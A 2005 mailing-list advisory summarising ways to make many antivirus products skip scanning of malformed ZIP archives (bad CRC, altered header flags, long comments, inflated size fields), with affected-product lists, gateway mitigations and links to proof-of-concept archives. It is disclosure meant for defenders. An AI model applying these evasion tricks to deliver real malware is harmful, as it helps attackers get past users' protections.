There have been lot of noise and confusion regarding all the issues reported lately... So, let me sum them up. ___________________________________________________________________________________ Multiple Vendor Antivirus Products Malformed ZIP Attachment Scan Evasion Vulnerability Affected Product: mks_vir BitDefender 7.0 AntiVir DrWeb 4.32b eTrust-Iris 7.1.194.0 Fortinet 2.51 eTrust-Vet 11.7.0.0 McAfee 4445 Norman 5.70.10 Sybari 7.5.1314 Symantec 8.0 F-Prot 3.16a Kaspersky McAfee 4445 ( Updated March 16, 2005 6:00 GMT ) Migration: For the time being, set filter rules in your AV/email gateway to filter out archive embedded with executables (exe, com, pif, scr, cpl etc) Block all type of broken archive and archive with passwds in it. Description: 1). If you create a zip archive with invalid CRC checksum...... some AV skip the archive marking it as clean........ by this way, you can bypass antivirus gateways and slip in any attachment without scanning the archive. Moreover, these days.... software tools automatically repair a *broken* archive. POC http://www.geocities.com/visitbipin/crc.zip 2). In Local file header if you modify "general purpose bit flag" 7th & 8'th byte of a zip archive with \x2f ie: "\" some AV skip the file marking it as clean, because the AV come to a false assumption that zip file is encrypted. This was discovered during the analysis of "Multiple AV Vendor Incorrect CRC32 Bypass Vulnerability." poc: http://www.geocities.com/visitbipin/gpbf.zip 3). If you have a long archive comment... in a zip archive these AV can't detect virus embedded in it. I came to know Symantec 8.1 is immune to the bug? POC: http://www.geocities.com/visitbipin/long_coment.zip 4). In the 'local file header" & "data descriptor" if you change the compressed size and uncompressed size to greater than the actual file size there are many AV that can't scan the file properly. P0C: http://www.geocities.com/visitbipin/Antigen.zip <--- try Moreover there are unzip utilities that goes to a loop if the file size is changed to ffffffff ! Lets hope, less popular AV/Trojan scanner out there don't have such faulty code! Unzip utilities will successfully extract such archive with some garbage data \x00 at the end "255 bytes. (FORGE the crc right, first) The garbage data doesn't *that matter because any malicious code can execute without any problem with the garbage at its end. This will successfully bypass AV detection even for a known malicious code, "MOST OF THE TIME" if the AV detects the "SOME" executable comparing total its checksum instead of analyzing a particular chunk of code in the code's body. I think its true for some of those old little (few bytes) viruses. But, modern AV engines in most cases don't depend on such primitive technique to detect a virus so it shouldn't be a "that" big issue. 5). Another 5'th issues... and I'm feeling lazy to type/describe it now. have a look at, http://www.securityfocus.com/archive/1/393291 Be noted, http://www.geocities.com/visitbipin/test_nav.zip ...contains a self extracting archive that will extract the POC named *.eicar.zip It is better to extract the it from the exe archive as there are some AV out there that can't even scan a infected file embedded in a self extracting zip archive! (O; Name of vulnerable products were gathered from feedbacks of the Full-disclosure Mailing list and some private discussion with others and is believed to be true. You can run the file through www.virustotal.com , or http://virusscan.jotti.org/ or http://sandbox.norman.no/live_4.html and you'll know what I'm talking about . Though I understand, they might be using the CLI engine in most cases (if not all) while there are other functionalities in a full AV package that are not in the CLI-based engine. Thanks, "Pedro Bustamante" for reminding me out. Another interesting link, is http://www.aerasec.de/security/index.html?id=ae-200503-020&lang=en Dr. Peter Bieringer's advisory. Useful Reference: http://www.pkware.com/company/standards/appnote/ regards, Bipin Gautam http://www.geocities.com/visitbipin/ Disclaimer: The information in the advisory is believed to be accurate at the time of printing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect or consequential loss or damage arising from use of, or reliance on this information. __________________________________ Do you Yahoo!? Yahoo! Small Business - Try our new resources site! http://smallbusiness.yahoo.com/resources/
